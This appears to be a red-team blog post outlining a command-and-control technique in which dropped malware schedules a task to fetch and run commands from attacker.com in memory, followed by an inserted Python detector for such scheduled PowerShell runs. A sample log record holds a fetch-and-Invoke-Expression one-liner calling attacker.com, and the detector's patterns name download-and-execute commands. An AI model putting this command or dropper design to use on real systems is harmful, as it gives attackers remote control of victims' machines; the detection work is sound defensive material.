Breach the formidable NAT and proxies
The goal of this technique is to illustrate how simply a single exploit execution can be turned into command and control capability.
There are several existing techniques for this, but robust configurations and patched systems stop all of them. This approach needs only two things:
- Client Malware
- Internet facing webpage
Here we assume that the victim has internet access, even if it is filtered, NATed, behind firewall(s) and load-balancing proxies. The assumption is that the victim can reach https://attacker.com/commands.txt at the application layer (say, from a browser), and of course that the victim system is able to execute the malware.
What I’m trying to avoid is a dedicated TCP connection, typical of a bind or reverse shell. Let’s say that strict policies leave no proper outgoing communication channel.
As stated earlier, the initial malware has to be deployed and executed successfully. It could be a macro-enabled document or an executable. My research does not cover malware evasion or AV bypass, though the type of payload required is not suspicious and should be easy to deploy.
The malware contains the dropper code, which has to do two things:
- Set a trigger / cron job that executes after a certain time, and
- Execute the code at https://attacker.com/commands.txt in memory, without saving it as a stager or static file on secondary storage.
Now all we have to do is update the text file with new commands. I prefer a .ps1 extension for the commands file since my malware is mostly PowerShell based, but you could choose whatever fits the scenario, as this is a concept.
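From the defender’s side, the two dropper steps above leave a recognisable trace: a PowerShell process started by the Task Scheduler whose command line both fetches a URL and evaluates the response in memory. The following Python script is an added example (not part of this post and not the PoC it mentions) that scans constructed process-creation records in a simplified key=value form; the field names follow Sysmon Event ID 1, while the paths, commands and domain are made up.

```python
import re

# Constructed sample process-creation records in a simplified key=value form.
# Field names follow Sysmon Event ID 1; paths, commands and the domain are made up.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoProfile -WindowStyle Hidden -Command "
    "\"(Invoke-WebRequest https://attacker.com/commands.ps1).Content | Invoke-Expression\"",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -File C:\\Scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoProfile -File C:\\ProgramData\\Maint\\cleanup.ps1",
]

# svchost.exe hosts the Schedule service (taskeng.exe on older Windows); it hosts many
# other services too, so a production rule would also check the hosted service name.
SCHEDULER_HOSTS = {"svchost.exe", "taskeng.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Remote fetch plus in-memory evaluation: the "nothing staged on disk" pattern above.
FETCH_RE = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|downloadstring|https?://", re.I)
INMEM_RE = re.compile(r"invoke-expression|\biex\b", re.I)
# Split only on a '|' that introduces a known field, so pipes inside CommandLine survive.
FIELD_SPLIT = re.compile(r"\|(?=(?:ParentImage|Image|CommandLine)=)")


def parse_event(line):
    """Turn one record into a dict; CommandLine may itself contain '=' and '|'."""
    fields = {}
    for part in FIELD_SPLIT.split(line):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_scheduled_remote_exec(ev):
    """Scheduler parent + PowerShell child + fetch-and-evaluate command line."""
    if basename(ev.get("ParentImage", "")) not in SCHEDULER_HOSTS:
        return False
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return False
    cmd = ev.get("CommandLine", "")
    return bool(FETCH_RE.search(cmd) and INMEM_RE.search(cmd))


def scan(lines):
    """Return the command line of every record that matches the pattern."""
    return [ev["CommandLine"] for ev in map(parse_event, lines) if is_scheduled_remote_exec(ev)]
```

Only the first record is flagged: the other scheduled PowerShell run executes a local file and the interactive one has no scheduler parent, so the check keys on the combination rather than on PowerShell alone.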
Note that although the victim is behind NAT from the attacker’s perspective, it is still vulnerable, because the victim can open attacker.com and read any file hosted there, as it is on the internet. This research provides red teamers with an added weapon in their arsenal. I’ll soon be publishing a technical PoC for this under GPL 3.0.
If you want to learn more, or if you are interested in helping with the project, head over to the GitHub repository.